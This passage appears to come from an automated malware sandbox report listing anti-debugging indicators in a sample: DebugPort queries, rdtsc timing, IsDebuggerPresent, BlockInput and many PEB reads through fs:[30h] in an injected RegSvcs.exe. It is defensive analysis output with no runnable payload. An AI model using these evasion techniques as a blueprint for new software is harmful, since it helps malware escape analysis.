              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_00409AB0 rdtsc 15_2_00409AB0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0040ACF0 LdrLoadDll,15_2_0040ACF0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AF3FF BlockInput,8_2_005AF3FF
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A46878
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00535D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00535D78
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A4ECAA mov eax, dword ptr fs:[00000030h]0_2_00A4ECAA
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00555078 mov eax, dword ptr fs:[00000030h]8_2_00555078
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01708158 mov eax, dword ptr fs:[00000030h]15_2_01708158
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C156 mov eax, dword ptr fs:[00000030h]15_2_0166C156
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676154 mov eax, dword ptr fs:[00000030h]15_2_01676154
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676154 mov eax, dword ptr fs:[00000030h]15_2_01676154
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov ecx, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A0124 mov eax, dword ptr fs:[00000030h]15_2_016A0124
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01730115 mov eax, dword ptr fs:[00000030h]15_2_01730115
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov ecx, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov eax, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov eax, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov eax, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017461E5 mov eax, dword ptr fs:[00000030h]15_2_017461E5
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A01F8 mov eax, dword ptr fs:[00000030h]15_2_016A01F8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017361C3 mov eax, dword ptr fs:[00000030h]15_2_017361C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017361C3 mov eax, dword ptr fs:[00000030h]15_2_017361C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov ecx, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B0185 mov eax, dword ptr fs:[00000030h]15_2_016B0185
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A197 mov eax, dword ptr fs:[00000030h]15_2_0166A197
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A197 mov eax, dword ptr fs:[00000030h]15_2_0166A197
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A197 mov eax, dword ptr fs:[00000030h]15_2_0166A197
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01714180 mov eax, dword ptr fs:[00000030h]15_2_01714180
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01714180 mov eax, dword ptr fs:[00000030h]15_2_01714180
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172C188 mov eax, dword ptr fs:[00000030h]15_2_0172C188
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172C188 mov eax, dword ptr fs:[00000030h]15_2_0172C188
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169C073 mov eax, dword ptr fs:[00000030h]15_2_0169C073
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01672050 mov eax, dword ptr fs:[00000030h]15_2_01672050
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6050 mov eax, dword ptr fs:[00000030h]15_2_016F6050
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706030 mov eax, dword ptr fs:[00000030h]15_2_01706030
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A020 mov eax, dword ptr fs:[00000030h]15_2_0166A020
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C020 mov eax, dword ptr fs:[00000030h]15_2_0166C020
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F4000 mov ecx, dword ptr fs:[00000030h]15_2_016F4000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A0E3 mov ecx, dword ptr fs:[00000030h]15_2_0166A0E3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016780E9 mov eax, dword ptr fs:[00000030h]15_2_016780E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F60E0 mov eax, dword ptr fs:[00000030h]15_2_016F60E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C0F0 mov eax, dword ptr fs:[00000030h]15_2_0166C0F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B20F0 mov ecx, dword ptr fs:[00000030h]15_2_016B20F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F20DE mov eax, dword ptr fs:[00000030h]15_2_016F20DE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017360B8 mov eax, dword ptr fs:[00000030h]15_2_017360B8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017360B8 mov ecx, dword ptr fs:[00000030h]15_2_017360B8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017080A8 mov eax, dword ptr fs:[00000030h]15_2_017080A8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167208A mov eax, dword ptr fs:[00000030h]15_2_0167208A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171437C mov eax, dword ptr fs:[00000030h]15_2_0171437C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173A352 mov eax, dword ptr fs:[00000030h]15_2_0173A352
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01718350 mov ecx, dword ptr fs:[00000030h]15_2_01718350
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov ecx, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA30B mov eax, dword ptr fs:[00000030h]15_2_016AA30B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA30B mov eax, dword ptr fs:[00000030h]15_2_016AA30B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA30B mov eax, dword ptr fs:[00000030h]15_2_016AA30B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C310 mov ecx, dword ptr fs:[00000030h]15_2_0166C310
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690310 mov ecx, dword ptr fs:[00000030h]15_2_01690310
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016803E9 mov eax, dword ptr fs:[00000030h]15_2_016803E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A63FF mov eax, dword ptr fs:[00000030h]15_2_016A63FF
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E3F0 mov eax, dword ptr fs:[00000030h]15_2_0168E3F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E3F0 mov eax, dword ptr fs:[00000030h]15_2_0168E3F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E3F0 mov eax, dword ptr fs:[00000030h]15_2_0168E3F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017143D4 mov eax, dword ptr fs:[00000030h]15_2_017143D4
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017143D4 mov eax, dword ptr fs:[00000030h]15_2_017143D4
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A3C0 mov eax, dword ptr fs:[00000030h]15_2_0167A3C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A3C0 mov eax, dword ptr fs:[00000030h]15_2_0167A3C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A3C0 mov eax, dword ptr fs:[00000030h]15_2_0167A3C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A3C0 mov eax, dword ptr fs:[00000030h]15_2_0167A3C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A3C0 mov eax, dword ptr fs:[00000030h]15_2_0167A3C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A3C0 mov eax, dword ptr fs:[00000030h]15_2_0167A3C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016783C0 mov eax, dword ptr fs:[00000030h]15_2_016783C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016783C0 mov eax, dword ptr fs:[00000030h]15_2_016783C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016783C0 mov eax, dword ptr fs:[00000030h]15_2_016783C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016783C0 mov eax, dword ptr fs:[00000030h]15_2_016783C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E3DB mov eax, dword ptr fs:[00000030h]15_2_0171E3DB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E3DB mov eax, dword ptr fs:[00000030h]15_2_0171E3DB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E3DB mov ecx, dword ptr fs:[00000030h]15_2_0171E3DB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E3DB mov eax, dword ptr fs:[00000030h]15_2_0171E3DB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F63C0 mov eax, dword ptr fs:[00000030h]15_2_016F63C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172C3CD mov eax, dword ptr fs:[00000030h]15_2_0172C3CD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169438F mov eax, dword ptr fs:[00000030h]15_2_0169438F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169438F mov eax, dword ptr fs:[00000030h]15_2_0169438F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166E388 mov eax, dword ptr fs:[00000030h]15_2_0166E388
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166E388 mov eax, dword ptr fs:[00000030h]15_2_0166E388
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166E388 mov eax, dword ptr fs:[00000030h]15_2_0166E388
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01668397 mov eax, dword ptr fs:[00000030h]15_2_01668397
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01668397 mov eax, dword ptr fs:[00000030h]15_2_01668397
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01668397 mov eax, dword ptr fs:[00000030h]15_2_01668397
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720274 mov eax, dword ptr fs:[00000030h]15_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674260 mov eax, dword ptr fs:[00000030h]15_2_01674260
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674260 mov eax, dword ptr fs:[00000030h]15_2_01674260
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674260 mov eax, dword ptr fs:[00000030h]15_2_01674260
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166826B mov eax, dword ptr fs:[00000030h]15_2_0166826B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F8243 mov eax, dword ptr fs:[00000030h]15_2_016F8243
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F8243 mov ecx, dword ptr fs:[00000030h]15_2_016F8243
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A250 mov eax, dword ptr fs:[00000030h]15_2_0166A250
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676259 mov eax, dword ptr fs:[00000030h]15_2_01676259
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166823B mov eax, dword ptr fs:[00000030h]15_2_0166823B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016802E1 mov eax, dword ptr fs:[00000030h]15_2_016802E1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016802E1 mov eax, dword ptr fs:[00000030h]15_2_016802E1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016802E1 mov eax, dword ptr fs:[00000030h]15_2_016802E1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A2C3 mov eax, dword ptr fs:[00000030h]15_2_0167A2C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A2C3 mov eax, dword ptr fs:[00000030h]15_2_0167A2C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A2C3 mov eax, dword ptr fs:[00000030h]15_2_0167A2C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A2C3 mov eax, dword ptr fs:[00000030h]15_2_0167A2C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A2C3 mov eax, dword ptr fs:[00000030h]15_2_0167A2C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016802A0 mov eax, dword ptr fs:[00000030h]15_2_016802A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016802A0 mov eax, dword ptr fs:[00000030h]15_2_016802A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017062A0 mov eax, dword ptr fs:[00000030h]15_2_017062A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017062A0 mov ecx, dword ptr fs:[00000030h]15_2_017062A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017062A0 mov eax, dword ptr fs:[00000030h]15_2_017062A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017062A0 mov eax, dword ptr fs:[00000030h]15_2_017062A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017062A0 mov eax, dword ptr fs:[00000030h]15_2_017062A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017062A0 mov eax, dword ptr fs:[00000030h]15_2_017062A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F0283 mov eax, dword ptr fs:[00000030h]15_2_016F0283
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F0283 mov eax, dword ptr fs:[00000030h]15_2_016F0283
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F0283 mov eax, dword ptr fs:[00000030h]15_2_016F0283
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE284 mov eax, dword ptr fs:[00000030h]15_2_016AE284
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE284 mov eax, dword ptr fs:[00000030h]15_2_016AE284
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A656A mov eax, dword ptr fs:[00000030h]15_2_016A656A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A656A mov eax, dword ptr fs:[00000030h]15_2_016A656A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A656A mov eax, dword ptr fs:[00000030h]15_2_016A656A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678550 mov eax, dword ptr fs:[00000030h]15_2_01678550
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678550 mov eax, dword ptr fs:[00000030h]15_2_01678550
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E53E mov eax, dword ptr fs:[00000030h]15_2_0169E53E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E53E mov eax, dword ptr fs:[00000030h]15_2_0169E53E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E53E mov eax, dword ptr fs:[00000030h]15_2_0169E53E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E53E mov eax, dword ptr fs:[00000030h]15_2_0169E53E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E53E mov eax, dword ptr fs:[00000030h]15_2_0169E53E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680535 mov eax, dword ptr fs:[00000030h]15_2_01680535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680535 mov eax, dword ptr fs:[00000030h]15_2_01680535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680535 mov eax, dword ptr fs:[00000030h]15_2_01680535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680535 mov eax, dword ptr fs:[00000030h]15_2_01680535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680535 mov eax, dword ptr fs:[00000030h]15_2_01680535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680535 mov eax, dword ptr fs:[00000030h]15_2_01680535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706500 mov eax, dword ptr fs:[00000030h]15_2_01706500
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744500 mov eax, dword ptr fs:[00000030h]15_2_01744500
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744500 mov eax, dword ptr fs:[00000030h]15_2_01744500
